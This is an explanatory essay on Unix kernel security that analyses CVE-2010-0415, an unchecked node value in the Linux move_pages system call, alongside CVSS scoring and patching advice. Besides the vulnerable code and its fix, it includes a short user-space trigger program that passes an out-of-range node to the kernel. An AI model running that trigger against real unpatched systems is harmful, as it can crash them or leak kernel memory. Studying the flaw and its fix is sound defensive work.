The Kernel's Role in a Unix System


The role of the kernel in a Unix system is to control all input and output and to allocate the system's time and memory. The kernel also contains the file system, which is the main mechanism by which computer security is enforced and which controls how directories and files are stored on the hard drive. Though Unix has appealing methods for controlling how users access files, modify databases and use system resources, these do not help much when the system is misconfigured or hit by malicious software; such weaknesses become openings that expose the system to vulnerabilities. As D. Ritchie put it: "The first fact to face is that UNIX was not developed with security, in any realistic sense, in mind; this fact alone guarantees a vast number of holes." The design is simple and effective, but even in modern computing environments the system does not protect against flawed or malicious code. James Morrison (2009) said that "security has been enhanced but is constrained by original Unix design and that the approach is continual retrofit of newer security schemes, rather than fundamental redesign."

Failure to employ effective security leaves the system vulnerable to attack: the system can be affected in undesirable ways, or users may gain access to information and services without consent or control. Vulnerabilities must in general be considered destructive and must not be given room to breed. Vulnerability is the end product of poor security, and it starts within the internal or organizational network. Powerful routers are employed at the perimeter to control traffic and to filter what is allowed through and what must be blocked, but less attention is given to the inside, where users work on a daily basis, and we forget that insiders can also be threats, whether deliberately or by mistake. Kevin Poulsen et al. (2000) wrote: "No system on a network can be truly safe from the blanket category of 'server vulnerability.' They can occur not only in the daemons and services on a machine, but also in the operating system itself."

Most denial of service is the result of user error or runaway programs rather than explicit attacks, but the rapid spread of exploit code greatly accelerates the denial of service that such code causes. Though there are many ways for this code to enter a network, the leniency of system administrators contributes significantly to the rise of these attacks, giving intruders a chance to explore the system and plant malicious code that can cause denial of service. The initial goal of a Linux attacker is to gain access to a local host by taking control of the root account. Traditionally the superuser account has unrestricted access to every component of the system, so even when protections are configured, an attacker with superuser privileges can disable those services and cover their tracks by modifying log files. The intention of someone who causes denial of service is either to damage or destroy resources so that no one can use them, or to overload some system service or deliberately exhaust some resource, thus preventing others from using it.
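As a small illustration of that enforcement point, the permission bits the kernel consults on every file access can be inspected from user space with stat(); a minimal sketch (the path argument is whatever the caller supplies):

#include <stdio.h>
#include <sys/stat.h>

/* Print the classic Unix permission bits of a file: these are the
 * values the kernel checks each time a process opens the file. */
int main(int argc, char **argv)
{
        struct stat st;

        if (argc < 2 || stat(argv[1], &st) != 0) {
                perror("stat");
                return 1;
        }
        printf("%s: mode %o (owner %o, group %o, other %o)\n", argv[1],
               st.st_mode & 0777,
               (st.st_mode >> 6) & 7, (st.st_mode >> 3) & 7, st.st_mode & 7);
        return 0;
}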

Though we may agree to disagree, S. Garfinkel (1996, p. 701) wrote: "Although the Unix security model is basically sound, programmers are careless. Most security flaws in Unix arise from bugs and design errors in programs that run as root or with other privileges, as a configuration error, or through unanticipated interactions between such programs." These kinds of problems create the openings that give intruders the chance to make changes to our systems, resulting in denial of service or in worse outcomes such as a system crash. Programming error or not, the bottom line is that they leave the system open; in most cases these errors arise while programmers are trying to fix another error, and although they are bound to happen, they still need to be corrected. This is further admitted by the Linux developers, whose misjudgement resulted in CVE-2010-0415. Eugene Teo (Security Response) admitted that they "incorrectly depended on the 'node_state/node_isset()' functions testing the node range, rather than checking it explicitly. That's not reliable, even if it might often happen to work."

CVE-2010-0415: Ramon de Carvalho Valle discovered an issue in the sys_move_pages interface, which in Debian is limited to the amd64, ia64 and powerpc64 flavours. The do_pages_move() function in mm/migrate.c in the Linux kernel before 2.6.33-rc7 does not validate node values, which allows local users to read arbitrary kernel memory locations: kernel memory can be read from user space via the "node" value passed to do_pages_move(). The issue occurs because the node tests in the node_state() and node_isset() functions fail to explicitly check node ranges. By specifying a node that is not part of the kernel's node set, a local user can exploit this to cause a denial of service (an OOPS, i.e. a system crash) or to gain access to sensitive kernel memory, with the possibility of other, unspecified impact. Simply supplying a crafted node value to a sys_move_pages call is enough to read potentially sensitive information from kernel memory, and may also crash the target system. The bug affects Linux kernel versions from 2.6.18 up to, but not including, 2.6.33-rc7, and it is located in the move_pages system call code. By studying sample code, we can work out how the exploit works.

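The sample code discussed below was originally excerpted by xorl from mm/migrate.c; what follows is a simplified sketch of the vulnerable inner loop of do_pages_move(), reconstructed from kernels of that era, with declarations and unrelated error handling trimmed:

/* mm/migrate.c, do_pages_move() -- simplified sketch of the inner loop */
for (j = 0; j < chunk_nr; j++) {
        const void __user *p;
        int node;

        err = -EFAULT;
        if (get_user(p, pages + j + chunk_start))
                goto out_pm;
        pm[j].addr = (unsigned long) p;

        if (get_user(node, nodes + j + chunk_start))  /* user-chosen node */
                goto out_pm;

        err = -ENODEV;
        if (!node_state(node, N_HIGH_MEMORY))         /* no range check */
                goto out_pm;

        err = -EACCES;
        if (!node_isset(node, task_nodes))
                goto out_pm;

        pm[j].node = node;                 /* arbitrary value stored */
}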

As xorl's analysis of this code explains, the 'nodes' pointer determines what the system call will do, and it is entirely controlled by the user: when it is non-NULL, sys_move_pages() calls do_pages_move(). That function enters a 'for' loop for each chunk of pages, and an inner loop fills the pm[] list with user-supplied values that are used later without any range check. The calls to node_state() and node_isset() execute the code located in include/linux/nodemask.h. With this opening, a user can request any node value, initializing each pm[] entry's node field with an arbitrary value that is later returned to user space through put_user() in a 'for' loop, as can be read in the do_pages_move() routine's code. This can lead to a serious information leak.
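Those node tests reduce to raw bit operations; a simplified sketch of the relevant definitions in include/linux/nodemask.h of that era:

/* include/linux/nodemask.h (abridged) -- neither test bounds-checks 'node' */
#define node_isset(node, nodemask) test_bit((node), (nodemask).bits)

static inline int node_state(int node, enum node_states state)
{
        return node_isset(node, node_states[state]);
}

test_bit() simply indexes into a fixed-size bitmap, so an out-of-range node reads past the end of the mask and may well appear to be "set". To control the situation, a fix needs to be applied that checks the range explicitly before these tests: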

        err = -ENODEV;
+       if (node < 0 || node >= MAX_NUMNODES)
+               goto out_pm;
+
        if (!node_state(node, N_HIGH_MEMORY))

This fix checks that the signed integer 'node' is non-negative and that it does not reach the constant MAX_NUMNODES, which is defined in include/linux/numa.h.
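From user space, the vulnerable path is reached through the move_pages(2) system call; the following is a minimal, hypothetical trigger sketch (the out-of-range node value is arbitrary, and on a patched kernel the call simply fails with ENODEV):

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Hypothetical trigger for CVE-2010-0415: hand the kernel a node value
 * far beyond MAX_NUMNODES. A pid of 0 means "the calling process". */
int main(void)
{
        void *pages[1] = { malloc(4096) };   /* any mapped address */
        int nodes[1]   = { 0x7fffffff };     /* out-of-range node  */
        int status[1];

        long rc = syscall(SYS_move_pages, 0, 1UL, pages, nodes, status, 0);
        printf("move_pages returned %ld\n", rc);
        return 0;
}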

Calculating the extent of an exploit: the Common Vulnerability Scoring System (CVSS) is designed to solve the problem of multiple, incompatible scoring systems while remaining usable and understandable. It provides an open framework for communicating the characteristics and impacts of IT vulnerabilities. CVSS consists of three metric groups: Base, Temporal and Environmental. The Temporal metrics capture characteristics of a vulnerability that evolve over its lifetime, whereas the Environmental metrics capture those characteristics that are tied to an implementation in a specific user's environment. As CVE-2010-0415 is still new, only the base score has been calculated; the temporal and environmental scores are undefined.

The Base metrics represent the most fundamental, immutable qualities of a vulnerability: Access Vector, Access Complexity, Authentication, and the confidentiality, integrity and availability impacts (CVSS version 1 also had a seventh base metric, impact bias, which version 2 dropped). The Access Vector, Access Complexity and Authentication metrics capture how the vulnerability is accessed and whether any additional conditions are required to exploit it. The three impact metrics measure how a vulnerability, if exploited, will directly affect an IT asset, where the impacts are independently defined as the degree of loss of confidentiality, integrity and availability. The base score for CVE-2010-0415 is 4.6, with the vector (AV:L/AC:L/Au:N/C:P/I:P/A:P) expanded below:

Base Metric              Evaluation
Access Vector            Local (L)
Access Complexity        Low (L)
Authentication           None required (N)
Confidentiality Impact   Partial (P)
Integrity Impact         Partial (P)
Availability Impact      Partial (P)

The Access Vector simply tells how the exploit attacks: whether the machine is attacked locally or remotely; in this case the machine is attacked locally. Access Complexity measures how involved an attack must be to exploit the vulnerability once the machine has been accessed, and here it is rated low. No authentication is required to exploit this flaw. The confidentiality and integrity impacts are rated partial, meaning only limited information is disclosed or modified, and the availability impact is partial, meaning the interruption to resource availability is limited.
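The 4.6 figure follows mechanically from the published CVSS v2 base equation; a small sketch reproducing the arithmetic with the standard v2 weights:

#include <math.h>
#include <stdio.h>

/* CVSS v2 base score for AV:L/AC:L/Au:N/C:P/I:P/A:P, using the standard
 * v2 weights: Local 0.395, Low 0.71, None 0.704, Partial 0.275. */
int main(void)
{
        double av = 0.395, ac = 0.71, au = 0.704;
        double c = 0.275, i = 0.275, a = 0.275;

        double impact = 10.41 * (1 - (1 - c) * (1 - i) * (1 - a));
        double exploitability = 20 * av * ac * au;
        double f = (impact == 0) ? 0 : 1.176;
        double base = (0.6 * impact + 0.4 * exploitability - 1.5) * f;

        printf("base score = %.1f\n", round(base * 10) / 10);  /* 4.6 */
        return 0;
}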

Conclusion

The growing number of workstations and non-Unix machines on the international network, with its implicit assumptions about restricted access, leads to weakened security. Tools and techniques have been developed over the years to harden Linux hosts in an attempt to curb security threats. Setting up a system and putting it into production is not enough: it is important to check vendor notices and security forums to keep the software current with the latest security issues. Applying the appropriate security and bug patches, setting up backups and configuring monitoring tools are essential steps in building a secure system. System updates and patches should be applied promptly to safeguard the system and to avoid unnecessary time spent recovering from an intrusion; failure to employ the right measures may result in catastrophic loss and in openings that allow more dangerous and harmful code to be deployed. Although this helps administrators remain current with system challenges, it still leaves hosts susceptible to compromise in the window before vulnerabilities are publicly announced and fixes are distributed. Keeping systems up to date with vendor patches will stop the casual attacker from gaining access to a system, but will not always keep out an attacker who is targeting it.

Having the correct authorization rights also helps to control everything that happens in the system: many attacks can be prevented by restricting access to critical accounts and files, protecting them from unauthorized users. System administrators should likewise follow sound security practices to protect the integrity of the system; these principles assist in taking the right measures and making corrections at the right time, and in tracing vulnerabilities early enough to reverse them. One of the few protections Unix offers against internal or deliberate denial of service is its ability to limit the number of files or processes a user may consume, as sketched below. If security policies are adopted and used efficiently, the system's chances of survival are far better than under the high risk taken by ignoring what could save it in its time of need.
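Those per-user limits are exposed through the standard resource-limit interface; a minimal sketch using setrlimit() (the numeric caps are illustrative; a real deployment would set them in /etc/security/limits.conf or via the shell's ulimit):

#include <stdio.h>
#include <sys/resource.h>

/* Cap the open-file and process counts for this process and its
 * children -- the Unix guard against runaway resource exhaustion. */
int main(void)
{
        struct rlimit rl = { .rlim_cur = 256, .rlim_max = 256 };

        if (setrlimit(RLIMIT_NOFILE, &rl) != 0)  /* max open files */
                perror("setrlimit(RLIMIT_NOFILE)");
        if (setrlimit(RLIMIT_NPROC, &rl) != 0)   /* max processes per uid */
                perror("setrlimit(RLIMIT_NPROC)");
        return 0;
}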
